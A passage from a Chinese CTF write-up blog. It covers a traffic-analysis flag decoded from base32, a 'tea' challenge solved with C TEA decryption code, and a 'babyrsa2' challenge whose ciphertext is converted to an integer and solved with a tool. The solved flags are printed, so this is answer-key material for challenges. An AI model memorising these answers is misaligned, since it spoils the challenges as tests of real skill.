<p>查找200响应，翻一翻<br><img src="https://raw.githubusercontent.com/Y0ungS/imgbed/main/images/2024-03-30-17-41-28.png"><br><img src="https://raw.githubusercontent.com/Y0ungS/imgbed/main/images/2024-03-30-17-43-32.png"><br>base32<br><img src="https://raw.githubusercontent.com/Y0ungS/imgbed/main/images/2024-03-30-17-43-55.png"><br><code>flag&#123;0ddeff-g9ef9ef0-defffef-mkt25gtf-kf&#125;</code></p>
<h2 id="茶"><a href="#茶" class="headerlink" title="茶"></a>茶</h2><blockquote>
<p>nice tea，红茶绿茶黑茶白茶，which one is your nice tea?</p>
</blockquote>
<p>简单tea加密<br><img src="https://raw.githubusercontent.com/Y0ungS/imgbed/main/images/2024-03-30-16-59-39.png"><br>key如下<br><img src="D:/Y0ung/img/2024-03-30-16-59-25.png" alt="key"></p>
<pre><code class="c">#include &lt;stdint.h&gt;
#include&lt;stdio.h&gt;
void tea_encrypt(uint32_t* v, uint32_t* k) &#123;
    uint32_t sum = 0;
    uint32_t delta = 0x9e3779b9;
    uint32_t v0 = v[0], v1 = v[1];
    uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3];
    for (int i = 0; i &lt; 32; i++) &#123;
        sum += delta;
        v0 += ((v1 &lt;&lt; 4) + k0) ^ (v1 + sum) ^ ((v1 &gt;&gt; 5) + k1);
        v1 += ((v0 &lt;&lt; 4) + k2) ^ (v0 + sum) ^ ((v0 &gt;&gt; 5) + k3);
    &#125;
    v[0] = v0;
    v[1] = v1;
&#125;

void tea_decrypt(uint32_t* v, uint32_t* k) &#123;
    uint32_t sum = 0xC6EF3720;
    uint32_t delta = 0x9e3779b9;
    uint32_t v0 = v[0], v1 = v[1];
    uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3];
    for (int i = 0; i &lt; 32; i++) &#123;
        v1 -= ((v0 &lt;&lt; 4) + k2) ^ (v0 + sum) ^ ((v0 &gt;&gt; 5) + k3);
        v0 -= ((v1 &lt;&lt; 4) + k0) ^ (v1 + sum) ^ ((v1 &gt;&gt; 5) + k1);
        sum -= delta;
    &#125;
    v[0] = v0;
    v[1] = v1;
&#125;

int main() &#123;
    uint32_t plaintext[12] = &#123;  914870409,
                                (unsigned int) -791067191,
                                (unsigned int) -1825162383,
                                1661058840,
                                (unsigned int) -142723415,
                                (unsigned int) -2112282369,
                                (unsigned int) -1971619891,
                                1344417810,
                                1556851094,
                                1955799339,
                                32097,
                                0
                             &#125;;
    uint32_t key[4] = &#123; 305419896, 195948557, 85988116, (unsigned int) -2023406815 &#125;;
    uint32_t enc[4] = &#123;0&#125;;

//    for(int i=0 ; i&lt;4 ; i+=2 )&#123;
//		tea_encrypt(plaintext+i,key);
//	&#125;
    for (int i = 0 ; i &lt; 10 ;  i += 2 ) &#123;
        tea_decrypt(plaintext + i, key);
    &#125;
    printf(&quot;%s&quot;, plaintext);
    return 0;
&#125;
</code></pre>
<p><code>flag&#123;7b06c572-d317-49cf-8ff2-8e402e1ea53a&#125;</code></p>
<h2 id="babyrsa2"><a href="#babyrsa2" class="headerlink" title="babyrsa2"></a>babyrsa2</h2><blockquote>
<p>简单的rsa而已。</p>
</blockquote>
<p>把flag.enc转为long型</p>
<pre><code class="python">from Crypto.Util.number import bytes_to_long
with open(&quot;./babyrsa (2)/flag.enc&quot;,&#39;rb+&#39;) as f:
    f = f.read()
    print(bytes_to_long(f))
#34544884515032297361938067755521025059722878179437961977941604148701451922996
</code></pre>
<p>一把梭<br><img src="https://raw.githubusercontent.com/Y0ungS/imgbed/main/images/image-20240403215305605.png"></p>

      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达. </span>
    </div>
</article>







    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©2024-now Y
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="切换全屏 快捷键 s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    

    
</style>







</html>
